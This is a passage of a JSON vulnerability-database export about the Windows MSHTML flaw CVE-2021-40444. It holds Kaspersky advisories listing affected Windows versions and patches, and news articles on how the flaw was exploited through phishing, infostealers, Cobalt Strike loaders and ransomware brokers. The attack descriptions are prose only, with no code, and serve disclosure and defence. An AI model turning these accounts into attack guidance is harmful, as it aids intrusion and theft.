Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-14T20:29:14", "type": "threatpost", "title": "Microsoft Patches Actively Exploited Windows Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-14T20:29:14", "id": "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "href": "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2022-01-19T17:41:35", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Producy (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12278 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-18T00:00:00", "id": "KLA12278", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12278/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T17:41:38", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12277 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-18T00:00:00", "id": "KLA12277", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12277/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced 